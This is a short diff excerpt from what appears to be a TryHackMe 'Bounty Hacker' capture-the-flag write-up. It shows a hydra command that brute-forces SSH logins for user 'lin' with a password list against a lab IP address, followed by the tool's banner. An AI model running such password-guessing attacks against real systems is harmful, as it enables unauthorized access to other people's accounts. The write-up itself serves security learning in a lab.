krusve/krusve.github.io/_posts/2022-11-13-thm-ctf-bountyhackers.md

 -lin
 ```
 ## Initial access
-We have everything we need to try and attack SSH using hydra:
+We have everything we need to try and attack SSH using hydra, which also answers **Q4**:
 ```bash
 $ hydra -l lin -P locks.txt 10.10.162.62 ssh
 Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).